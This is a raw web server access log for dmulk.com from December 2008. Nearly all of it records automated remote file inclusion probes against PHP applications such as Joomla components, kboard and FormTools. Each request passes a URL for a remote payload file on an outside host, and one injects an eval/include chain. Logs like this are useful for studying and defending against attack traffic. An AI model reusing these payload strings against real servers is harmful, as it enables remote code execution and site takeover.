72.30.142.152 - - [08/Dec/2008:10:08:25 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/trackback/ HTTP/1.0" 200 7104 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.56.55.158 - - [08/Dec/2008:10:08:32 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.220.6 - - [08/Dec/2008:10:08:45 -0800] "GET /logs/access_080801.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.220.6 - - [08/Dec/2008:10:08:45 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.220.6 - - [08/Dec/2008:10:08:45 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:08:46 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:08:46 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:08:59 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:09:00 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:09:00 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:09:01 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:09:02 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:10:09:29 -0800] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/kebrok_joss/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:10:09:29 -0800] "GET /FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/kebrok_joss/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:10:09:29 -0800] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/kebrok_joss/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:10:09:33 -0800] "GET /logs/access_080408.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:10:09:33 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:10:09:34 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:10:09:37 -0800] "GET /logs/access_080524.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/kebrok_joss/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:10:00 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:10:00 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:10:01 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:10:01 -0800] "GET /logs/access_080228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:10:21 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:10:21 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:10:21 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:10:30 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:10:30 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:10:30 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.107.65.41 - - [08/Dec/2008:10:10:41 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "MSR-ISRCCrawler" "www.dmulk.com"
131.107.65.41 - - [08/Dec/2008:10:10:43 -0800] "GET /logs/access_080218.log HTTP/1.1" 200 622413 "-" "MSR-ISRCCrawler" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:10:44 -0800] "GET /logs/access_081111.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:10:55 -0800] "GET /logs/access_080401.log//appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:10:57 -0800] "GET /logs/access_081113.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:11:10 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:11:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:11:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:11:27 -0800] "GET /logs/access_080511.log//appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:11:30 -0800] "GET /logs/access_081113.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:11:37 -0800] "GET /logs/access_081111.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:12:10 -0800] "GET /logs/access_081113.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:18 -0800] "GET /logs/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:18 -0800] "GET /logs/access_080614.log/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:18 -0800] "GET /logs/access_080519.log/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:18 -0800] "GET /frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.193.220.6 - - [08/Dec/2008:10:12:24 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:12:30 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:12:30 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:12:30 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:12:33 -0800] "GET /logs/index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:12:33 -0800] "GET /logs/access_080503.log/index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:12:34 -0800] "GET /index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 94669 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.14.22.20 - - [08/Dec/2008:10:12:37 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:38 -0800] "GET /logs/access_080614.log%20%20/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:12:38 -0800] "GET /logs/access_080519.log%20%20/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.200.11 - - [08/Dec/2008:10:13:06 -0800] "GET /logs/access_080116.log/frag.php?exec=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:13:14 -0800] "GET /logs/access_080523.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:13:14 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:13:14 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:13:14 -0800] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:10:13:15 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:10:13:15 -0800] "GET /logs/access_080502.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:10:13:15 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.23.116.97 - - [08/Dec/2008:10:13:18 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.23.116.97 - - [08/Dec/2008:10:13:18 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.23.116.97 - - [08/Dec/2008:10:13:18 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:13:19 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:13:19 -0800] "GET /logs/access_080523.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:13:19 -0800] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:13:19 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:13:29 -0800] "GET /logs/access_081111.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:10:13:52 -0800] "GET /logs/access_080523.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:10:13:52 -0800] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:14:05 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:14:05 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:14:05 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.23.116.97 - - [08/Dec/2008:10:14:16 -0800] "GET /logs/access_081111.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:10:14:18 -0800] "GET /logs/access_081113.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.186.15.66 - - [08/Dec/2008:10:14:35 -0800] "GET /logs//content/josowbot.content.php?mosConfig_absolute_path=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
91.186.15.66 - - [08/Dec/2008:10:14:35 -0800] "GET /content/josowbot.content.php?mosConfig_absolute_path=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:14:47 -0800] "GET /FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:14:47 -0800] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:14:47 -0800] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.23.116.97 - - [08/Dec/2008:10:15:07 -0800] "GET /logs/access_081113.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:10:15:09 -0800] "GET /errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:15:11 -0800] "GET /logs/access_080524.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:16 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:16 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:17 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:28 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:28 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:15:30 -0800] "GET /?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 94694 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:33 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:15:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:10:15:39 -0800] "GET /logs/access_081113.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:10:16:07 -0800] "GET /logs/access_080906.log/errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:10:16:07 -0800] "GET /errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:10:16:07 -0800] "GET /logs/errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:10:16:34 -0800] "GET /logs/access_080930.log/errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:16:58 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:16:58 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:16:58 -0800] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
